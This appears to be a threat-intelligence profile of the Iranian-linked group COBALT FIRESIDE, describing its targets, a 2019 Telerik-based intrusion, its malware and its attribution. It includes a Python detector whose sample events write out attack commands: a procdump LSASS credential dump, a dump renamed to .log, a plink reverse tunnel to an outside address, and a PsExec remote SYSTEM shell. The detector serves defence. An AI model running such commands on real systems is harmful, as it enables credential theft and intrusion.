COBALT FIRESIDE
SUMMARY
Since at least December 2017 COBALT FIRESIDE has targeted organizations in the government, military, defence, aerospace and information technology sectors, with notable concentrations in the United States and Saudi Arabia. COBALT FIRESIDE tradecraft has been reported in open source under the identifiers Tortoiseshell, TA456 and Imperial Kitten.
In a 2019 intrusion COBALT FIRESIDE exploited a Telerik UI for ASP.NET AJAX vulnerability (CVE-2017-9248) to drop a variant of the ASPXSpy webshell and leveraged the resulting access to deploy FireBAK (aka SysKit). The group used PuTTY Link (plink.exe) and PsExec to move laterally and entrench its access. Procdump, downloaded from a compromised website, was used to dump the Local Security Authority Subsystem Service (LSASS) process and save the result to ls.dmp, which was later renamed to ls.log to disguise the memory dump as a log file.
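The intrusion chain above (Procdump against LSASS, the .dmp renamed to .log, plink and PsExec for lateral movement) is the kind of post-exploitation activity endpoint telemetry catches well. The following detector is an added example written for this page, not CTU or Secureworks code, and runs over constructed Sysmon-style process-creation events; the field names ("host", "image", "cmdline"), file paths, host names, the 203.0.113.10 address and the sample command lines are all assumptions chosen to mirror the reported tradecraft.

```python
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (not real telemetry).
# Field names "host", "image" (full path) and "cmdline" are assumptions.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "srv01", "image": r"C:\Windows\Temp\procdump.exe",
     "cmdline": r"procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\ls.dmp"},
    {"host": "srv01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c rename C:\Windows\Temp\ls.dmp ls.log"},
    {"host": "srv01", "image": r"C:\Windows\Temp\plink.exe",
     "cmdline": r"plink.exe -N -R 8080:127.0.0.1:3389 tunnel@203.0.113.10 -pw hunter2"},
    {"host": "srv02", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\srv03 -accepteula -s cmd.exe"},
    # Benign event: a .log file opened by an editor should not fire any rule.
    {"host": "ws07", "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": r'"notepad++.exe" C:\Users\a\server.log'},
]

# Matches cmd rename/ren/move of a .dmp file and captures the destination name,
# so a dump given a non-.dmp extension (ls.dmp -> ls.log) can be flagged.
_RENAME_RE = re.compile(
    r"\b(?:rename|ren|move)\s+\"?(?P<src>\S+?\.dmp)\"?\s+\"?(?P<dst>[^\s\"]+)\"?",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    # ntpath handles Windows separators regardless of the host platform.
    return ntpath.basename(path).lower()


def _alert(rule: str, ev: Dict[str, str]) -> Dict[str, str]:
    return {"rule": rule, "host": ev["host"], "evidence": ev["cmdline"]}


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per rule match, in event order."""
    alerts: List[Dict[str, str]] = []
    for ev in events:
        image = _basename(ev["image"])
        cmd = ev["cmdline"]
        cmd_l = cmd.lower()

        # 1. LSASS memory dump: procdump (or a renamed copy using -ma) aimed at lsass.
        if "lsass" in cmd_l and (image.startswith("procdump") or " -ma " in cmd_l):
            alerts.append(_alert("lsass_dump_procdump", ev))

        # 2. Dump file renamed to hide its extension (ls.dmp -> ls.log).
        m = _RENAME_RE.search(cmd)
        if m and not m.group("dst").lower().endswith(".dmp"):
            alerts.append(_alert("dmp_extension_masquerade", ev))

        # 3. plink opening a remote (-R) tunnel back to attacker infrastructure.
        if image == "plink.exe" and re.search(r"\s-R\s", cmd):
            alerts.append(_alert("plink_reverse_tunnel", ev))

        # 4. PsExec launching a SYSTEM (-s) shell on a remote host (\\host).
        if image.startswith("psexec") and "\\\\" in cmd and re.search(r"\s-s\b", cmd_l):
            alerts.append(_alert("psexec_system_shell", ev))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']}: {a['evidence']}")
```

The rename rule is the one worth keeping even if the others are already covered by your EDR: the LSASS dump itself is noisy and well signatured, but the follow-up step of giving the dump an innocuous extension is what lets it survive on disk and travel out as a "log", and it is cheap to match on command-line telemetry.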
CTU researchers connected this intrusion to the Hire Military Heroes campaign that COBALT FIRESIDE was conducting in parallel, based on a shared command and control (C2) address. That campaign used a fake veterans' employment support website, mimicking a legitimate organization, to distribute malware.
COBALT FIRESIDE uses custom malware including FireBAK (aka SysKit), LiderBird (aka Liderc) and LEMPO alongside publicly available tools to conduct its intrusions. In July 2021 Facebook disrupted around 200 accounts linked to COBALT FIRESIDE activity. The reporting describes extensive use of multiple social media and messaging platforms to engage targets, build rapport and deliver malicious payloads. The group also runs phishing operations using domains that spoof media, technology, webmail, short link services, cloud services and niche entertainment products.
CTU researchers have linked malware samples used by COBALT FIRESIDE to the Iranian company Mahak Rayan Afraz (MRA). Facebook publicly linked MRA to Tortoiseshell activity in July 2021.